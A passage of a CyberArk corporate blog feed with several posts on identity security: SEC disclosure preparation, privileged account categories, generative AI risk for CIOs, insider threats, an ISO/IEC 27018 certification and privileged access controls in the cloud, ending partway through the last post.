1. Review your organization’s current incident response and reporting process. Having a solid playbook in place isn’t enough. It takes repetition and muscle memory to act quickly and decisively to minimize an attack’s impact. Conducting regular readiness exercises will help teams uncover technical gaps and process or communication breakdowns that could hinder timely response and disclosure.

2. Assess the threat landscape. Threat actors’ techniques change, but identity remains a constant in the attack lifecycle. According to the CyberArk 2023 Identity Security Threat Landscape Report, the number of human and machine identities is expected to balloon by 240%. Nearly half of all identities require sensitive access to perform their roles, making them appealing and plentiful targets for threat actors. And almost all (99%) security professionals expect an identity-related compromise to occur in their environment in the next year. When you consider the numbers and impact of recent major breaches, it’s clear this is no longer an identity and access management (IAM) or even a cybersecurity problem – this is a business problem. To properly manage risks to your business, you must understand where your most critical assets are, who (human identities) and what (machine identities) can access them, how these identities access them, when this happens and for how long.

3. Evaluate existing controls. As part of the SEC’s new rules, companies must add specific details about their cybersecurity programs in annual 10-K filings. Now is the time to analyze existing security controls and policies against recognized standards, such as the NIST Cybersecurity Framework or ISO/IEC 27002, to identify areas where your controls do not adequately mitigate your risk. From there, it comes down to prioritization. Most security leaders will focus on “buying back” the most risk in the shortest amount of time using the least amount of resources. Securing identities often rises to the top of prioritized lists, given the surge in human and machine identities and associated risks. With a sufficient sense of urgency, critical identity security controls (that emphasize Zero Trust and least privilege principles for monitoring and controlling access) can be implemented quickly – as is often done in the wake of actual breaches. It’s wise to focus initial steps on securing high-value targets that represent the greatest potential risk to the business:

Embedded image

After taking these steps, you can extend the breadth and depth of your defenses to mature your identity security strategy. If you’re looking for prescriptive guidance, check out the CyberArk Blueprint for Identity Security Success.

4. Prepare for “materiality” decision-making. As part of the SEC ruling, public companies must file a Form 8-K with the SEC within four days of determining a cyber incident is “material.” There are many factors to consider when determining the materiality of a cyber incident. Part of the CISO’s job is to rapidly assess the situation and provide relevant information (i.e., what happened, when, what was impacted, what is still unknown) to help their organization make that call. The ability to track all identities effectively, coupled with continuous threat detection and analysis, is one of the best ways to ascertain this information in a timely manner.

5. Sharpen business risk communication skills. As the organization’s cybersecurity “translator,” the CISO must communicate business risk to the Board effectively and efficiently – now even more so given time-based disclosure mandates. This means reframing technical metrics and demystifying cyber risk by using more relatable terms, such as financial or reputational impact. Explore ways to integrate cost-benefit analysis into your organization’s existing cybersecurity framework to help quantify risk and mitigation ROI for key control areas. In the meantime, continue professional development pursuits to sharpen your communications and change management skills. And actively broaden your professional network, as there may be times when you’ll need to “phone a friend” (for instance, a fellow CISO/CIO or insurance expert) to help explain the implications of a cyberattack to the Board.

Building Cyber Resilience Through Enhanced Collaboration

The SEC’s new time-based ruling is one of many government steps to push the ball forward. Yet building cyber resilience takes significant collaboration on all fronts.

At an organizational level, CISOs must get even closer to their Boards and business stakeholders. Regular conversations and relationship-building efforts are key to understanding their priorities, challenges and risk tolerance. With these insights security leaders can shape “big picture” cybersecurity programs that align to key business goals, maximize risk reduction and hold up under investor scrutiny.

In the same vein, more cooperative action across private and public sectors is needed to raise our collective defense and protect our borderless networks from evolving threats. These cybersecurity reports to the SEC should be rapidly analyzed and anonymized for distribution to the cyber defense community. If properly implemented, this SEC initiative can be used with others to help enable all of us working together to reach the vision of the former Office of the National Cyber Director: “You need to beat all of us to beat one of us.”

James Imanian is Senior Director of the U.S. Federal Technology Office at CyberArk.

]]>
3 Types of Privileged Accounts to Secure in a Transforming Enterprise https://www.cyberark.com/blog/3-types-of-privileged-accounts-to-secure-in-a-transforming-enterprise-2/ Thu, 24 Aug 2023 21:35:45 +0000 https://www.cyberark.com/?p=182052 Privleged Access

For security teams managing their enterprises’ privileged access management (PAM) programs, times have changed and what’s considered a privileged or high-risk account has drastically shifted. In turn, the way organizations not only manage privilege, but comprehensively secure it, must also shift.

Historically, organizations have managed their PAM programs by vaulting and rotating credentials on privileged accounts. Security controls are put in place for specific users, such as admins and specific accounts like a domain admin account. This approach no longer satisfies organizational needs.

According to 2,300 IT security decision-makers surveyed in the CyberArk 2023 Identity Security Threat Landscape Report, there’s a significant gap. Sixty-three percent say that the highest-sensitivity access for their organization’s employees is not adequately secured at a time when they expect both human and non-human identities to grow roughly 240% in the coming year.

Security professionals feel this way because privileged access as we know it has evolved (you can have a look at our blog post on this same subject from PAM’s 2017 scrapbook to see an earlier take on that evolution for yourself). The big change catalyst: the types of privileged accounts that need to be secured have expanded in scope and scale, as enterprises made moves to become more digital and cloud based. A fresh approach to PAM programs means understanding the wide range of accounts and their vulnerabilities.

These days there are three categories for classifying privileged accounts:

  1. System accounts
  2. Operational accounts
  3. Application accounts

All these accounts encompass human and non-human identities, each with distinct levels of privilege that require separate management to restrict the attack surface.

Visual breakdown of the three privileged account categories with examples. The three categories are: system accounts; operational accounts; and application/machine accounts.

Let’s dive into the different privileged account types organizations must secure and dynamically provision:

1) Accounts with System-level Privileged Access

System-level privileged access accounts are administrative accounts, often established by the operating system or cloud provider. These accounts possess inherent high-risk characteristics, featuring persistent privileges and predefined passwords, necessitating secure vaulting, deployment in emergency access situations and ongoing monitoring for authorized user access.

Here are a few examples of these accounts:

  • Domain administrator accounts have complete privileged access to all resources, servers and workstations within the domain. The domain admin is the most powerful account in the domain and is installed automatically on the first domain controller and created for Active Directory.
  • Linux root accounts have unlimited access to all programs, files and resources on a designated Linux system, VM or cloud instance running Linux services.
  • AWS root accounts are the first identity created by default in a cloud service provider (CSP), and all CSPs have some root account. They control everything in the instance and are a prime target for bad actors. It’s best practice to vault these accounts and never use them for day-to-day tasks. Instead, keeping the AWS example, create an AWS IAM user account with varying privileges to adhere to the principle of least privilege (PoLP). You can replace the accounts with federated identities and grant permissions using zero standing privilege (ZSP) platforms.
  • Azure active directory (AAD) global admin accounts are like AWS Root accounts – they are the most-privileged account tied to your Azure tenant. Avoid using these accounts for day-to-day tasks; instead, vault and centrally manage them using a PAM solution.

2) Operational Accounts with Privileged Access

Operational accounts with privileged access roles are created for SaaS applications and CSPs and they should be used for day-to-day tasks that have varying permissions levels. Following a ZSP north star, these accounts do not need standing privileges and should be provisioned just-in-time (JIT).

These accounts include:

  • SaaS business application accounts are created administrative accounts used for, cloud consoles, CRMs, or ERP systems privileged accounts because they can access sensitive data and business-critical information. These accounts can be accessed by employees, vendors and contractors, and they hold varying entitlements and access levels, making them significant threat targets.
  • Privileged personal accounts, such as personal admin or -A accounts, are used for server administration, deployment and infrastructure support.
  • AWS IAM user accounts are created by an AWS root user with varying levels of entitlements and attributes to carry out day-to-day tasks. These accounts can be used by humans, applications or machine-based identities and can be assigned to role-based access groups. Users needing access to the AWS console should have an IAM account to adhere to the principle of least privilege and avoid sharing credentials.

3) Application or Machine Accounts – Non-Human Accounts with Privileged Access

Application or machine non-human accounts are used for machines to communicate, applications, RPA bots, container services and IoT/OT devices. These accounts also bring out additional threats to the organization.

A few types of these accounts are:

  • Service accounts, which are found in Unix and Linux, Windows and CSPs. They’re created to manage tasks, application pools, run virtual machines (VMs), scripts, automated services and interact with operating systems. Service accounts and their dependencies should be centrally managed, vaulted, and their access should be monitored and audited.
  • Robotic process automation (RPA) accounts emulate humans and are used to build, deploy and manage software robots to carry out automation tasks. These non-human accounts are privileged and often share credentials to extract data, interact with cloud services and APIs. RPA technology introduces a new attack surface given the level of privilege needed to do their job.

Secure Identities and Shutdown Attackers

High-risk access is an ongoing issue as organizations scale. Whether that be on-premises, cloud consoles or SaaS-based applications – privilege is everywhere and managing an evolving PAM program means securing access for modern use cases.

With this in mind, today’s attack surface has evolved and become more complex – and how organizations secure their privileged accounts must remain in step with effective security controls. Implementing an identity security framework with intelligent controls at the center will allow you to secure the keys to the kingdom and enable operational efficiencies for your users and extended workforce.

Learn how CyberArk can help you address modern use cases for your PAM program – and keep your organization safe from identity-based threats.

Ryne Laster is a product marketing manager at CyberArk.

]]>
CyberArk Global CIO on Balancing AI Opportunities and Risks https://www.cyberark.com/blog/cyberark-global-cio-on-balancing-ai-opportunities-and-risks/ Tue, 22 Aug 2023 12:50:22 +0000 https://www.cyberark.com/?p=181648 CyberArk Global CIO on Balancing AI

Generative artificial intelligence (AI) has officially arrived at the enterprise and is poised to disrupt everything from customer-facing applications and services to back-end data and infrastructure to workforce engagement and empowerment. Cyberattackers also stand to benefit: 93% of security decision makers expect AI-enabled threats to affect their organization in 2023, with AI-powered malware cited as the No. 1 concern.

Facing this reality, IT and security leaders must strategically capture new business value while mitigating the risk brought by AI-enabled tools. A security-first mindset and the ability to adapt are critical because, as years in the military taught me, the only way to the end is through.

Five Steps for Securely Embracing the Enterprise AI Opportunity

Part of my job as CyberArk Global Chief Information Officer is utilizing new data-driven tools and cloud technologies to support resiliency, speed and scale. It’s an exciting time to be a technologist and I see many potential ways to harness AI technology to advance CyberArk’s mission and growth. In some areas, we’re already doing so. Personally, I believe AI tools can help me be a more productive, focused and impactful leader.

Yet navigating AI’s Wild West is challenging. With no playbook or precedent to follow, information sharing is crucial. In that spirit – and based on our team’s experiences, ongoing peer conversations and market insights – here are five practices for IT and security leaders to consider as enterprise AI use cases expand:

1. Define your organization’s AI position from the start. Is your company already using generative AI at enterprise scale? Perhaps it is just beginning a proof of concept (PoC) to test the waters. Or maybe it has drawn a hard line by blocking ChatGPT and similar tools until regulators can catch up and guardrails are codified. Whatever your organization’s AI position may be, it must be clearly defined and communicated from the top so everyone starts – and stays – on the same page.

2. Open the lines of communication. Establishing AI-specific company guidelines, publishing usage policies and updating employee cybersecurity training curricula are necessary steps. But real dialogue goes both ways.

At CyberArk, employees are encouraged to send their AI-related questions, ideas and requests to a dedicated email address. An AI “tiger team” of cross-functional experts meets bi-weekly to review and respond to each submission, identify high-value use cases and work to create secure models – using AI tools and aligning with organizational policy – that teams can use. As we move forward, this team will play an integral role in tackling emerging challenges and devising creative strategies that help us maximize AI benefits.

3. Revisit the internal software request process. According to the 2023 CyberArk Identity Security Threat Landscape Report, employees in 62% of organizations use unapproved AI-enabled tools that can increase security risk. This highlights the need for IT and security leaders to adapt their approaches or risk being viewed as innovation blockers.

Like most IT departments, my team is experiencing a surge in workforce requests for AI-enabled tools and add-ons. In response, we’ve enhanced our third-party software vetting system to help meet employees’ needs more efficiently while doing our due diligence. But this process doesn’t stop at employee requests. Why? Because “assume breach” also means we must “assume shadow IT” (software downloaded and used without IT’s approval) and “assume clicks” (especially as AI-fueled phishing campaigns become increasingly convincing). We proactively layer endpoint security controls with malware-agnostic defenses to enforce Zero Trust and least privilege and close gaps caused by inevitable human error.

4. Speak the CFO’s language. As technology leaders, we must build operationally efficient platforms and environments – even more so in the current economic climate. As changemakers, we must demonstrate AI’s business value to our CFOs. An honest, rational approach backed by hard data is critical; illustrating how a tool can help advance multiple business priorities is even more powerful.

Here’s an example “pitch” that uses recent stats on the AI-powered developer tool GitHub Copilot: “Early data shows that this tool can help our developers code – and innovate – up to 55% faster. But increased speed is just the start – it can also help us engage our employees more effectively: 75% of developers say the tool helps them feel more fulfilled and able to focus on more satisfying work. This is important since studies have linked higher job satisfaction to stronger employee retention, customer loyalty and company financial performance.”

5. Continuously assess AI threats. This means rigorously assessing all AI-enabled tools before use, continuously assessing all AI-enabled tools in use and having the ability to immediately block and roll back any AI-enabled tool if it’s necessary. It also means constantly thinking like an attacker and concentrating on identities, their greatest opportunity area.

Security researchers have already uncovered numerous ways that threat actors could use AI to improve techniques in the early phases of identity-based attacks. For instance, AI can help them write legitimate-sounding email copy for phishing campaigns, generate malware that evades detection or bypass facial recognition authentication. Just recently, CyberArk Labs used a short clip of my voice – pulled from the only English-language podcast I’ve ever recorded – to create an AI-generated deep fake that could be used for voice phishing. It’s yet another way attackers are innovating to circumvent traditional security controls. If my colleagues could do this in less than five minutes, imagine how easy it would be for an attacker to impersonate a high-profile executive or government leader who’s frequently on TV.

Amplifying Security Approaches with AI

Generative AI Embedded

IT and security teams are also using AI to adapt and improve cyber resilience. While human talent remains critical for combatting emerging threats, AI can help bridge some of the gaps caused by the 3.4-million-person cybersecurity worker shortage. CyberArk’s latest research found that 41% of cybersecurity teams use AI to address skills and resource shortages and 47% use AI for automation today.

Generative AI has the potential to transform many security functions as it continues to improve. Take the security operations center (SOC), for example. By automating time-intensive tasks such as triaging level-one threats or updating security polices, hard-working SecOps professionals can focus on more satisfying work. Ultimately, this may help reduce staffing shortage issues while curbing employee turnover and attrition – the second largest contributor to the cyber skills shortage, according to the latest (ISC)2 Cybersecurity Workforce Study.

Technology is constantly changing. Right now, we’re experiencing another wave in a continuous evolution cycle. There will be challenges ahead, but leadership is all about making decisions in the face of uncertainty. With an open mind and unwavering security focus, technology leaders can confidently navigate these uncharted waters and embrace new opportunities.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Grossman on CyberArk’s Security Matters | CIO Connections page.

]]>
Five Workforce Trends That Intensify Insider Threats https://www.cyberark.com/blog/five-workforce-trends-that-intensify-insider-threats/ Thu, 17 Aug 2023 14:15:30 +0000 https://www.cyberark.com/?p=181696 Five Workforce Trends That Intensify Insider Threats

Insider threats don’t often seem like threats at all. They look like colleagues working diligently at the office, logging on to the corporate network from Starbucks or providing a critical third-party service. But insider threats are a big problem that’s getting even bigger and costlier to tackle.

Insider threats

A 2022 Ponemon Institute study found that insider threat incidents surged by 44% in the two years analyzed, with impacted organizations spending $15.38 million annually on average to deal with the fallout. While hard numbers aren’t yet available for 2023, global risks and economic pressure are fueling five major workforce challenges that further intensify insider threats.

1. Workforce reductions. With any employee layoff or resignation comes the possibility that the person may take something they shouldn’t. According to the 2023 CyberArk Identity Security Threat Landscape Report, 58% of security professionals report instances of exiting users saving sensitive or confidential work documents outside of policy. In times of organizational turmoil, when concerns about layoffs might increase, these insider threats can worsen.

Consider this high-profile incident at a major beverage manufacturer: after learning of her upcoming layoff, an engineer exfiltrated documents containing trade secrets worth nearly $120 million in her final days as an employee. According to reports, she was one of just two people with access to the specifics of a top-secret chemical formula – the archetypal privileged user. The engineer was ultimately convicted and sentenced for her crime; however, the case highlights challenges many companies face in protecting intellectual property and other critical assets, especially during times of workforce change. Sixty-eight percent of security decision-makers expect layoffs and workforce churn to create new security issues in the next 12 months.

2. Shrinking third-party ecosystem. Cybersecurity risks due to belt-tightening extend to third-party vendors, such as contractors with insider access to sensitive information. If a third-party relationship ends and permissions aren’t promptly removed, the vendor could still access company assets or an external actor could hunt down these orphaned accounts and use them for malicious purposes.

Managing third-party access is a thorny challenge, no matter what’s happening in the world. In fact, surveyed security professionals say third parties – partners, consultants and service providers – represent the riskiest human identities.*

3. Rising “resenteeism.” As a July 2023 New York Times headline declared, “The ‘Great Resignation’ is over.” In this unstable economy, more employees are staying put. And a workplace buzzword is gaining traction to describe workers who aren’t thrilled about it – “resenteeism.” Whatever their grievances – from lack of job satisfaction to feeling undervalued or burned out – these workers tend to air them out in the open. Not only can resenteeism negatively affect workplace culture and productivity, but it can also increase malicious insider threat incidents.

Imagine an employee who’s experienced repeated promotion denials, feels undervalued and is growing increasingly resentful of their employer. “Getting even” might involve stealing or leaking sensitive data – or even advertising their ability to undermine their organization’s security, as security researchers recently observed. In a time when 63%*of organizations have not adequately secured the highest sensitivity access for their employees, there’s a chance the “resenteeist” could get away with it.

4. Personal financial hardship. The 2023 Verizon DBIR suggests that inflation and the soaring cost of living may be fueling more financially motivated insider threats. According to the report, privilege misuse – defined as “employees abusing the access they have been given to do their jobs,” and the leading cause of non-accidental internal actor breaches – is more often paired with fraudulent transactions than in the past several years. This could look like a financial comptroller – a privileged identity with access to systems where bank accounts and routing information are stored – making an unauthorized transfer into their own personal account.

DBIR authors write, “Seeing internal actors increasingly just redirect funds is especially concerning, considering it may be someone in a position to siphon significant resources away from the organization.”

5. Stress-driven slip-ups. Workforce reductions and churn have a profound impact on remaining employees. Many are expected to shoulder additional work, which can negatively impact stress levels. And stress goes hand in hand with mistakes.

Susceptibility to phishing and other social engineering attacks is already sky-high. Recent assessments by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) found that within the first 10 minutes of receiving a malicious email, 84% of employees took the bait by replying with sensitive information or interacting with a spoofed link or attachment. Overworked and overstressed employees could make it even easier for phishing attackers to “hook” credentials. And since 50%* of workforce identities have access to sensitive corporate data, their odds of reeling in a prize-winning catch are good.

As insider threats loom large, who can you trust?

That’s a trick question. Eighty-four percent of organizations experienced an identity-related breach in the past year* – further proof that trust has no place in cybersecurity.

By eliminating trust, any threat’s origin – inside, outside, anywhere – becomes less relevant. And without daunting labels, complicated threat categories or patchwork protections, security gets a lot simpler.

That’s the promise of identity security: powerful and continuous protection wrapped around every identity, grounded in Zero Trust and least privilege. With full visibility and control, organizations can quickly spot access misuse or abuse and other high-risk activities. Empowered, they can block and prevent threats from reaching critical assets and safeguard their infrastructure, devices and people – wherever they go.

 

*Source: 2023 CyberArk Identity Security Threat Landscape Report

Bryan Murphy is senior director of Architecture Services & Incident Response at CyberArk.

]]>
CyberArk Achieves ISO/IEC 27018 Certification – an International Standard for Cloud Privacy https://www.cyberark.com/blog/cyberark-achieves-iso-iec-27018-certification-an-international-standard-for-cloud-privacy/ Tue, 15 Aug 2023 18:35:29 +0000 https://www.cyberark.com/?p=181607 CyberArk Achieves ISO/IEC 27018 Certification – an International Standard for Cloud Privacy

It is my distinct honor to announce that CyberArk has officially achieved ISO/IEC 27018:2019 certification – the first privacy-specific international standard for cloud service providers focused on safeguarding personally identifiable information (PII), one of the most mission-critical components of cloud security.

Today, more than 8,000 organizations across 110 countries – including more than half of the Fortune 500 – trust CyberArk to protect their most critical assets. Maintaining this trust is our highest priority and we hold ourselves to stringent security and compliance standards. Part of this ongoing commitment involves rigorous reviews of our information security systems and infrastructure. With this ISO/IEC 27018:2019 certification, CyberArk has achieved significant, independent recognition for protecting data privacy and exceeding customer, partner and regulatory requirements for cloud security, transparency and accountability.

The ISO/IEC 27018 standard outlines specific guidelines to reduce information security risks pertaining to PII in public cloud offerings. It supplements and strengthens controls outlined in ISO/IEC 27002 and provides specific security guidance for protecting PII, which NIST defines as “any representation of information that permits the identity of an individual to whom the information applies to be reasonably inferred by either direct or indirect means.” This includes sensitive information such as a person’s full name, address, phone number or social security number.

CyberArk has built the following key guidelines into our security control framework to demonstrate conformance with ISO/IEC 27018:2019, emphasize our responsibility in handling sensitive data and show our customers how their data is securely stored, processed and managed in our cloud computing systems:

  • CyberArk does not use customer data for business marketing or advertising unless the customer consents to such use. The customer has control over their own data and CyberArk only processes PII in accordance with the customer’s instructions.
  • CyberArk handles PII in a specific manner when transmitting over public networks, storing on mobile devices or recovering or restoring data. Relevant CyberArk staff must also sign a confidentiality agreement and CyberArk provides specialized training for employees directly processing PII.
  • In the event of a breach affecting customer data, CyberArk will notify the customer without undue delay, maintain a clear record of the incident and assist the customer in remaining compliant with their own security obligations.
  • CyberArk must disclose the names of any sub-processors (and any location information about where PII may be processed). If we change sub-processors mid-contract, we must also disclose this information and provide the customer with the right to object to the change.

We remain committed to ensuring that all customer and partner information, in any form, is protected from unauthorized access, modification, disclosure or deletion.

You can learn more about CyberArk’s security practices and industry certifications in our Trust Center.

Omer Grossman is the global chief information officer at CyberArk.

]]>
Operationalizing Identity Security in the Public Cloud https://www.cyberark.com/blog/operationalizing-identity-security-in-the-public-cloud/ Thu, 10 Aug 2023 18:19:43 +0000 https://www.cyberark.com/?p=181547

As enterprises increasingly migrate to the public cloud, identity and access management (IAM) inconsistencies across different cloud providers pose a significant hurdle. Effectively securing identities in this complex landscape has proven to be a challenge. Discussions with industry analysts and enterprise clients have highlighted a prevalent issue: the existing security tool suite often falls short in providing actionable measures to weave identity security into cloud operations.

Many enterprises use native cloud provider tools, third-party security solutions and custom-built strategies to meet their cloud security needs. However, most of these approaches are reactive, offering band-aid fixes rather than robust, scalable solutions. The challenge then lies in devising a sustainable identity strategy for the cloud environment and operationalizing it effectively.

From Concept to Execution: Operationalizing Cloud Identity Security

The CyberArk Cloud Security framework offers a systematic and phased approach to streamline identity security operations within the cloud. It converts the broader concept of “IAM in the public cloud” into a solid, ROI-focused initiative. And we begin with the right set of identity security capabilities, such as risk-based access controls, entitlements risk and visibility, identity automation and orchestration, secrets management and audit and compliance – all supported by the enforcement of cloud best practices.

cloud-environments-access

Prioritizing and Implementing the Proper Controls

Cloud identity and its associated challenges are constantly evolving, given the continuous innovation from cloud providers. At last count, there are over 1,400 native services spread across AWS, GCP and Azure, bringing in more than 40,000 entitlements and controls – and it’s an ever-growing list.

Standardizing roles or entitlements in this constantly changing environment becomes extremely challenging. This dynamic landscape often leaves IAM teams juggling multiple priorities. The initial focus is often on “discovery” and “right-sizing entitlements,” which fall within the domain of CIEM (Cloud Infrastructure Entitlements Management). While insightful, identifying and removing unused entitlements linked to cloud resources can be complex, particularly when unused permissions are tied to specific cloud project roles or identities.

As a result, resolving these issues necessitates a dialogue with the application teams, proof of non-utilization and a timeline for resolution. This can be lengthy, raising the question: while entitlement visibility and right-sizing is important, is it the first control to prioritize?

Meanwhile, during these debates about appropriate entitlements, standing access and associated risk persist in your cloud environments. Developers and apps often enjoy unrestrained, always-on access to your cloud environments. Especially in the case of lift-and-shift applications, developers often have standing access to the underlying compute workloads powering their applications. All these scenarios present a significant risk if these identities are compromised.

The Three Steps to Operationalizing Identity Security

To tackle this risk and streamline identity security operations, consider the following key steps:

1. Transition to a zero standing privilege model and eliminate standing access.
The road to least privilege is long and windy and comes with many operational challenges. To reduce your attack surface immediately, begin by transitioning all your privileged and non-privileged standing access to a just-in-time (JIT) based zero standing privilege (ZSP) model. The challenge lies in identifying your riskiest identities – admins, shadow admins, identities with sensitive privileges, identities with misconfigurations – and seamlessly shifting them to a JIT model.

CyberArk Cloud Security offers comprehensive visibility into your entire cloud identity estate’s risk and compliance posture. It enables the automatic and seamless migration of risky identities – or all cloud access – to a centralized platform: CyberArk Secure Cloud Access. By consolidating access policies, you can effectively manage and regulate access to resources across various cloud platforms, enhancing security and reducing complexity.

You can also stop the bleeding for new environments by utilizing a ZSP model when setting up new cloud environments, which ensures they start with a clean slate and no standing access. This can allow organizations to stop the bleeding of standing privileges. Nobody prefers revisiting and fixing issues.

Moving to a ZSP model significantly reduces your cloud risk surface, helps you demonstrate ROI via risk reduction to leadership, and helps you comply with cloud access control requirements stipulated by leading industry standards like NIST and SOC2.

2. Address non-human use cases and standardize audit and compliance.

Along with the immediate human access risks we’ve just addressed, there are, of course, non-human threats. Application and API access pose notable risks – and getting complete visibility into the non-human elements is a key measure.

Here are steps you can take to reduce significant risks:

  • Initiate centralizing non-human access and develop a unified system for managing secrets to secure access to your cloud environments.
  • Fix excessive and risky entitlements and identity issues across clouds. As you start addressing these issues, it’s essential to use a framework that helps you gain the right set of insights and take meaningful risk-reduction actions. Our Insight to Action framework in CyberArk Cloud Security was designed to help administrators do exactly that. The framework links risk insights to remediation recommendations that can be applied programmatically, through click-and-remediate solutions or automation.
  • Ensure that integrations are set up with the common tools used by the cloud security teams, cloud admins and infrastructure engineers. Integrations to ITSM and ChatOps tooling help seamlessly integrate access approval workflows and notifications.

3. Adopt proactive measures and embrace automation.

You’ve tackled the major risk factors related to human and non-human access and understand identity security nuances across the clouds used by your organization. Now embrace automation to enforce industry standards for both types of access.

There are over 100 out-of-the-box best practice rules in CyberArk Cloud Security, so you can extend the rule framework and build identity security rules based on your cloud environments’ internal guidelines and guardrails. This enables you to initiate the automation of fixes for common and recurring identity issues in the cloud.

Screenshot example of a rule-based finding.
Example of a rule-based finding.

Again, nobody wants to go back and fix things. Ensure that new apps and cloud environments conform to the best practices you want to establish. Make it easy by automating these checks in the Infrastructure-as-Code (IaC) provisioning process.

The above steps will help you to standardize audit and compliance requirements and gain complete visibility to cloud identities (human and non-human) and secrets dispersed across different stores in the cloud.

Driving Value Through Standardized Cloud IAM Operations

Standardizing cloud IAM operations with CyberArk Cloud Security means establishing a consistent methodology for managing and enforcing best practices, securing access for humans and non-humans – and auditing and compliance across your cloud estate.

When effectively operationalized, a cloud identity security solution enhances your cybersecurity defenses, saves time, reduces risk and validates its cost by delivering rapid, measurable value. It’s a journey from abstract to concrete, making the intangible quantifiable in a robust and agile manner.

Read more about the various access cloud challenges in the CyberArk executive POV, “Why Cloud Identity Security and Why It Seems So Hard.

Paddy Viswanathan is vice president of Cloud Solution Strategy at CyberArk.

]]>
The Cloud Security Layer Cake: Modern Use Cases for PAM https://www.cyberark.com/blog/the-cloud-security-layer-cake-modern-use-cases-for-pam/ Thu, 03 Aug 2023 15:37:30 +0000 https://www.cyberark.com/?p=181256 Layer Cake

Warm. Rich. Chocolatey. The way I see it, a proper chocolate layer cake is the best sensory experience a human can have. Let’s go a bit further still: good chocolate cake is the height of human achievement.

In the world of enterprise IT, one could say the same of a diverse, purpose-built IT infrastructure. Every enterprise application – whether internal or customer-facing – must run on the right server, virtual machine (VM), container or database for the task at hand.

And like a perfect chocolate cake, modern enterprise infrastructure is multi-layered. One foundational IT layer is the Linux and Windows servers that still effectively power tried and true applications on-premises. Another layer is composed of the cloud-hosted VMs where organizations ‘lift and shift’ applications in search of operational efficiencies. SaaS applications that empower the workforce are yet another layer. The same applies to the containers and serverless functions powering an enterprise’s cloud-native applications. And then, of course, there’s the most powerful (and highest-risk) layer of modern IT – the cloud management layer – where engineers and admins launch or change configurations via console or command-line interface (CLI).

Securing the identities with high-risk access to each of these layers requires tailored controls, identity security and privileged access management (PAM) programs that organizations charge with securing their highest-risk access can be carefully crafted to address every layer of modern IT infrastructure.

Essentially, PAM can help secure every layer of the cake. Here’s how…

Layer 1: PAM Controls for System-level Access to Workloads Running Inside VMs

It doesn’t matter how good a cake is if the foundation can’t support it. Many enterprises still directly manage much of the Linux, Windows, database and even mainframe infrastructure that powers their tried-and-true applications. This is especially true in highly regulated industries and verticals where low-latency computing is essential, like finance, energy and manufacturing. Even when organizations do move these established systems to the cloud for operational savings, many take a ‘lift-and-shift’ approach. These systems still work well, so there’s no need to re-architect them beyond moving them from on-prem servers to cloud-hosted VMs.

Whether they live on-premises or in the cloud, securing the privileged credentials and SSH keys that grant administrative access to these workloads will always be essential. This is especially true of built-in accounts on servers and VMs, such as Root accounts on Linux servers.

Foundational PAM best practices like automated credential rotation and least privilege access not only can reduce the risk of credential theft. Sometimes, these controls may even be required for IT security compliance or cyber insurance coverage.

Baking tip: Like good cake, good identity security programs need several layers. In addition to securing credentials, it’s essential to apply additional PAM best practices like monitoring and isolating privileged sessions. This can help deter insider threats while preventing ransomware and other malware from ever reaching VMs.

“Like good cake, good identity security programs need several layers. In addition to securing credentials, it’s essential to apply additional PAM best practices like monitoring and isolating privileged sessions.”

Layer 2: PAM Controls for Operational Access to Workloads Running ON VMs

Most VMs are short-lived. This is one of the foundational value propositions of cloud computing; organizations can run workloads on rented VMs without spending time and money on infrastructure maintenance. While high-risk administration on specific VMs may sometimes be necessary organizations generally don’t create dedicated system-level accounts (and the associated risk) for access to these short-lived machines.

PAM programs play an important role in securing access to ephemeral workloads. When access to specific, self-managed systems is needed, operational privileged access can be elevated just-in-time (JIT) to reduce the risk of credential theft, helping reduce standing privileges. IT and development teams can natively elevate access without SSH Keys or passwords using attribute-based access control (ABAC). Identity security teams can tag workloads for a specific project using CSP tagging features, allowing end users to natively connect only to resources tagged with this attribute. And since users don’t have passwords with standing privileges, there is a significantly reduced risk of credential theft.

Baking tip: The absence of credentials does not equate to the absence of trust. To embrace Zero Trust concepts for cloud access, embrace the ‘never trust, always verify’ paradigm. PAM Best practices like enforcement of least privilege and session isolation reduce trust. Meanwhile, the tried-and-true advice to implement adaptive multi-factor authentication (MFA) can help verify.

Layer 3: Access to Cloud Service Provider Services IN the Cloud

PAM teams already know: with great power comes great responsibility. Protecting the most powerful access in the public cloud is essential. And that includes the access elite engineers use to launch, configure and decommission the services powering their applications. Whether these engineers access this cloud management layer via web consoles or CLIs, their access must be protected.

JIT elevation can help reduce the risk of credential theft in these scenarios. But once access is elevated, development teams have, to borrow their parlance, ‘god-level’ entitlements to spin up – or take down – anything they want.

Many organizations are embracing the emerging security concept of zero standing privileges (ZSP) to safeguard development teams without slowing them down. In this model, engineers can elevate access JIT only to roles scoped with just enough permissions for the job at hand (or, in other words, least privilege access).

ZSP provides meaningful, defense-in-depth risk reduction. First, developers do not have credentials with always-on access, so those credentials can’t be stolen. Second, even if developers become malicious insiders or have their access compromised, their permissions are limited, reducing the blast radius of an attack.

Baking tip: Empower developers with ZSP, instead of slowing them down. In an outage or critical situation (‘critsit’), engineers need the ability to use their preferred tooling to request elevated entitlements and save the day. Integration with preferred development tooling is critical for these cases and any meaningful adoption of PAM controls. The same is true for session monitoring controls to deter internal threats and maintain audit trails for compliance purposes.

“Empower developers with ZSP, instead of slowing them down. In an outage or critical situation (‘critsit’), engineers need the ability to use their preferred tooling to request elevated entitlements and save the day.”

Layer 4: High-Risk Access to SaaS Apps

Risk isn’t confined to infrastructure and software environments. It also exists in cloud-hosted web applications used by every workforce member, from software engineers to HR and finance administrators. Unfortunately, this access also presents a significant security risk, considering attackers can use it to gain access to sensitive data.

Organizations can protect this final layer of high-risk access in the cloud with web browser session protection and monitoring controls. Session protection can defend against session hijacking and cookie theft attacks. Just as with infrastructure or console access, monitoring high-risk sessions can provide a complete audit trail of user activity to satisfy compliance requirements and deter internal misuse.

Baking tip: To get the cloud security recipe right, adjust controls according to the risk level of data in a SaaS application. For example, compromised access to apps containing IP or EHR data pose more risk than access to a training application. Just like with the PAM controls securing access to high-risk infrastructure, requiring step-up authentication to the most sensitive web apps is a simple best practice that can significantly reduce risk.

Bonus Layer: Secrets Management (the Icing on the Cake)

Humans aren’t the only identities requiring privileged access in multi-cloud environments. Machine identities like serverless functions, application accounts and RPA bots also use credentials to authenticate autonomous processes. In fact, it’s estimated that machine identities outnumber human identities in today’s software-heavy world by a factor of 45:1.

Organizations must govern application secrets consistently to reduce the risk of attackers compromising hardcoded credentials. Centralizing governance and credential rotation in a single cloud-agnostic hub can help mitigate this risk.

